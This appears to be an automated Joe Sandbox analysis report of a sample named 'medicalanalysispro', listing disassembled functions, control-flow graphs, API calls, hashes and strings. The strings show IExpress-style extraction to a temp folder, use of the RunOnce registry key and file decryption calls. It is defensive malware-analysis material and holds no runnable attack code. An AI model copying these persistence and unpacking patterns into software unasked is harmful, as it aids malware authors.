                                                                                                                                                                                                                                                                                                              • Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                                                                                                                                                                                                                                                                                              • Instruction ID: 84fc33792fda43fa981c73b25944a4abde668fabe2fd7c4946a1cfba0b2627ca
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E551F731A0DB42C6FB98AB18E8546B9BBA1FFAA745FC44135DB5D42658FF3CE0058720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE730EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151libraryfileloaderCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 495 7ff7bde730ec-7ff7bde73114 496 7ff7bde73116-7ff7bde7311c 495->496 497 7ff7bde73141-7ff7bde73148 call 7ff7bde75fe4 495->497 499 7ff7bde7311e call 7ff7bde760a4 496->499 500 7ff7bde73134-7ff7bde7313b call 7ff7bde73f74 496->500 506 7ff7bde7314e-7ff7bde73155 call 7ff7bde766c4 497->506 507 7ff7bde73236 497->507 504 7ff7bde73123-7ff7bde73125 499->504 500->497 500->507 504->507 508 7ff7bde7312b-7ff7bde73132 504->508 506->507 513 7ff7bde7315b-7ff7bde7319d GetSystemDirectoryA call 7ff7bde77ba8 LoadLibraryA 506->513 510 7ff7bde73238-7ff7bde73258 call 7ff7bde78470 507->510 508->497 508->500 517 7ff7bde731c9-7ff7bde731de FreeLibrary 513->517 518 7ff7bde7319f-7ff7bde731b8 GetProcAddress 513->518 520 7ff7bde73273-7ff7bde73288 SetCurrentDirectoryA 517->520 521 7ff7bde731e4-7ff7bde731ea 517->521 518->517 519 7ff7bde731ba-7ff7bde731c3 DecryptFileA 518->519 519->517 522 7ff7bde7328a-7ff7bde7328f 520->522 523 7ff7bde73291-7ff7bde73297 520->523 521->520 524 7ff7bde731f0-7ff7bde7320b GetWindowsDirectoryA 521->524 525 7ff7bde73212-7ff7bde73230 call 7ff7bde74dcc call 7ff7bde77700 522->525 526 7ff7bde7332d-7ff7bde73335 523->526 527 7ff7bde7329d-7ff7bde732a4 523->527 528 7ff7bde7320d 524->528 529 7ff7bde7325a-7ff7bde7326a call 7ff7bde76ca4 524->529 525->507 530 7ff7bde73349 526->530 531 7ff7bde73337-7ff7bde73339 526->531 532 7ff7bde732a9-7ff7bde732b7 527->532 528->525 535 7ff7bde7326f-7ff7bde73271 529->535 539 7ff7bde7334b-7ff7bde73359 530->539 531->530 536 7ff7bde7333b-7ff7bde73342 call 7ff7bde72318 531->536 532->532 537 7ff7bde732b9-7ff7bde732c0 532->537 535->507 535->520 548 7ff7bde73347 536->548 541 7ff7bde732fb call 7ff7bde75d90 537->541 542 7ff7bde732c2-7ff7bde732c9 537->542 544 7ff7bde7335b-7ff7bde73361 539->544 545 7ff7bde73376-7ff7bde7337d 539->545 555 7ff7bde73300 541->555 542->541 549 7ff7bde732cb-7ff7bde732f9 call 7ff7bde77ac8 542->549 544->545 552 7ff7bde73363 call 7ff7bde740c4 544->552 546 7ff7bde73388-7ff7bde7338d 545->546 547 7ff7bde7337f-7ff7bde73381 545->547 546->510 547->546 553 7ff7bde73383 call 7ff7bde7494c 547->553 548->539 559 7ff7bde73302 549->559 560 7ff7bde73368-7ff7bde7336a 552->560 553->546 555->559 561 7ff7bde73313-7ff7bde73321 call 7ff7bde7772c 559->561 562 7ff7bde73304-7ff7bde7330e 559->562 560->507 563 7ff7bde73370 560->563 561->507 566 7ff7bde73327 561->566 562->507 563->545 566->526
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                                                                              • API String ID: 3010855178-1173327654
                                                                                                                                                                                                                                                                                                              • Opcode ID: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7b8bcf6b46a0b40ebdf9c0e4f2f28ce1fd1c32ab8f349981574b0e034451426d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6711C20E0DA8386FAE9BB1DA840275E6A5AFB7740FD14035DB5D422ADFF6CE4458630
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE764E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 567 7ff7bde764e4-7ff7bde76510 568 7ff7bde76516-7ff7bde7651b call 7ff7bde763b8 567->568 569 7ff7bde765df-7ff7bde765ee 567->569 572 7ff7bde76520-7ff7bde76522 568->572 571 7ff7bde765f1-7ff7bde765fb 569->571 573 7ff7bde765fd-7ff7bde76603 571->573 574 7ff7bde76610-7ff7bde7661b 571->574 576 7ff7bde76688-7ff7bde7668a 572->576 577 7ff7bde76528-7ff7bde7653e 572->577 573->574 578 7ff7bde76605-7ff7bde7660e 573->578 575 7ff7bde7661e-7ff7bde76628 call 7ff7bde76b70 574->575 587 7ff7bde76649-7ff7bde7664b 575->587 588 7ff7bde7662a-7ff7bde7663d CreateDirectoryA 575->588 581 7ff7bde76698-7ff7bde766bc call 7ff7bde78470 576->581 580 7ff7bde76541-7ff7bde7654b 577->580 578->571 578->574 584 7ff7bde7654d-7ff7bde76553 580->584 585 7ff7bde76560-7ff7bde76575 580->585 584->585 589 7ff7bde76555-7ff7bde7655e 584->589 590 7ff7bde765cc-7ff7bde765dd call 7ff7bde77ba8 585->590 591 7ff7bde76577-7ff7bde7658f GetSystemInfo 585->591 594 7ff7bde7664d-7ff7bde76655 call 7ff7bde76ca4 587->594 595 7ff7bde7668c-7ff7bde76693 587->595 592 7ff7bde7667d-7ff7bde76682 call 7ff7bde77700 588->592 593 7ff7bde7663f 588->593 589->580 589->585 590->575 597 7ff7bde765bb 591->597 598 7ff7bde76591-7ff7bde76594 591->598 592->576 593->587 608 7ff7bde7665a-7ff7bde7665c 594->608 595->581 601 7ff7bde765c2-7ff7bde765c7 call 7ff7bde77ba8 597->601 599 7ff7bde76596-7ff7bde76599 598->599 600 7ff7bde765b2-7ff7bde765b9 598->600 605 7ff7bde7659b-7ff7bde7659e 599->605 606 7ff7bde765a9-7ff7bde765b0 599->606 600->601 601->590 605->590 610 7ff7bde765a0-7ff7bde765a7 605->610 606->601 608->595 611 7ff7bde7665e-7ff7bde76664 608->611 610->601 611->576 612 7ff7bde76666-7ff7bde7667b RemoveDirectoryA 611->612 612->576
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7BDE72CE1), ref: 00007FF7BDE7657C
                                                                                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7BDE72CE1), ref: 00007FF7BDE7662F
                                                                                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7BDE72CE1), ref: 00007FF7BDE7666F
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE763B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7BDE72CE1), ref: 00007FF7BDE76423
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE763B8: GetFileAttributesA.KERNELBASE ref: 00007FF7BDE76432
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE763B8: GetTempFileNameA.KERNEL32 ref: 00007FF7BDE7645B
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE763B8: DeleteFileA.KERNEL32 ref: 00007FF7BDE76473
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE763B8: CreateDirectoryA.KERNEL32 ref: 00007FF7BDE76484
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                                                                              • API String ID: 1979080616-3374052426
                                                                                                                                                                                                                                                                                                              • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9b52e7942462d4e29c85c7391220d73e43a23efdb54c8878a2d0ea1ea81d3775
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5515161A0D64281FADDBB2DA8102B9F7A0BF66B44FD84539CB4D4269DFF7CE405C620
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE72C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloadershutdownCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                                                                                                                                                                                                              • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                                                                              • API String ID: 1302179841-1204263913
                                                                                                                                                                                                                                                                                                              • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                                                                                                                                                                                                                                              • Instruction ID: c61e76fe2f0ed7515d944ff9a060d081ce3446d627def35bf67f5440036c1f48
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8310B31E0D64286FAE9BB68A8446B9F6A0AF77750FC44135DB4D0269DFF7CA4408620
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE7204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                                                                                                                                                                                                              • Instruction ID: 34711401afdede69f5cd578f8cdb1aecbfcedc8f3d3444d86fde4354753b0028
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3051933160CB8196EB55AF28E8442F8B7A1FB66B84FC48171DB4D07698EF3CD509C320
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE761EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                                                                                              • API String ID: 3049360512-3137473940
                                                                                                                                                                                                                                                                                                              • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6394e50472cdaa3d65495ce117e0de3baba2ec442e03678ec0b1550c842553b8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8510121A0C682D6EBD9AB18E8543B9B7B0FFA6745FC44135C74D46698EF2CD448C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE7473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3183975587-3916222277
                                                                                                                                                                                                                                                                                                              • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                                                                                                                                                                                                                                                              • Instruction ID: 76c7991621dc6c7b1e435fffbd6906698ce00a46568b731f89a8f510d3bfe6a2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E51A33290C682C7F7A5AB18E8443B9F7A0FBAA754F804135E74D46698EF7CD444CB20
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE72318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                                                                              • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                                                                                                                                              • Instruction ID: 63eb1eb6070448fa6d224d9427bfd0dacabab9c1f26c963ea509f51842e41cf1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73316F32A0CB82CAD7549F28E8405A9F7A4FB9A754F844535E74D43F58EF38D060CB10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE763B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                                                                              • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                                                                              • API String ID: 1082909758-3932986939
                                                                                                                                                                                                                                                                                                              • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                                                                                                                                              • Instruction ID: cbd167bcd600cea0c360e70be9d5b9cc02749394b9924e04470c79d7c5143585
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B21803160CA8186E698AB1AE9403B9E661FF9FB84FC48130DF4E47798EF3CD445C610
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE78200 Relevance: 12.1, APIs: 8, Instructions: 136sleepCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 701 7ff7bde78200-7ff7bde78249 call 7ff7bde78964 GetStartupInfoW 705 7ff7bde7824b-7ff7bde78256 701->705 706 7ff7bde78258-7ff7bde7825b 705->706 707 7ff7bde78262-7ff7bde7826b 705->707 708 7ff7bde7825d 706->708 709 7ff7bde78277-7ff7bde78282 Sleep 706->709 710 7ff7bde7826d-7ff7bde78275 _amsg_exit 707->710 711 7ff7bde78284-7ff7bde7828c 707->711 708->707 709->705 712 7ff7bde782f1-7ff7bde782fa 710->712 713 7ff7bde7828e-7ff7bde782ab 711->713 714 7ff7bde782e7 711->714 715 7ff7bde782fc-7ff7bde7830f _initterm 712->715 716 7ff7bde78319-7ff7bde7831b 712->716 717 7ff7bde782af-7ff7bde782b2 713->717 714->712 715->716 718 7ff7bde7831d-7ff7bde7831f 716->718 719 7ff7bde78326-7ff7bde7832e 716->719 720 7ff7bde782d9-7ff7bde782db 717->720 721 7ff7bde782b4-7ff7bde782b6 717->721 718->719 722 7ff7bde7835a-7ff7bde78369 719->722 723 7ff7bde78330-7ff7bde7833e call 7ff7bde788d0 719->723 720->712 724 7ff7bde782dd-7ff7bde782e2 720->724 721->724 725 7ff7bde782b8-7ff7bde782bc 721->725 729 7ff7bde7836d-7ff7bde78373 722->729 723->722 734 7ff7bde78340-7ff7bde78350 723->734 730 7ff7bde78444-7ff7bde78459 724->730 727 7ff7bde782ce-7ff7bde782d7 725->727 728 7ff7bde782be-7ff7bde782ca 725->728 727->717 728->727 732 7ff7bde783e6-7ff7bde783e9 729->732 733 7ff7bde78375-7ff7bde78377 729->733 735 7ff7bde783eb-7ff7bde783f4 732->735 736 7ff7bde783f8-7ff7bde78400 _ismbblead 732->736 738 7ff7bde7837d-7ff7bde78382 733->738 739 7ff7bde78379-7ff7bde7837b 733->739 734->722 735->736 740 7ff7bde7840a-7ff7bde78412 736->740 741 7ff7bde78402-7ff7bde78405 736->741 742 7ff7bde78384-7ff7bde7838e 738->742 743 7ff7bde78390-7ff7bde783c5 call 7ff7bde72c54 738->743 739->732 739->738 740->729 741->740 742->738 746 7ff7bde783c7-7ff7bde783c9 exit 743->746 747 7ff7bde783cf-7ff7bde783d6 743->747 746->747 748 7ff7bde783d8-7ff7bde783de _cexit 747->748 749 7ff7bde783e4 747->749 748->749 749->730
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2995914023-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
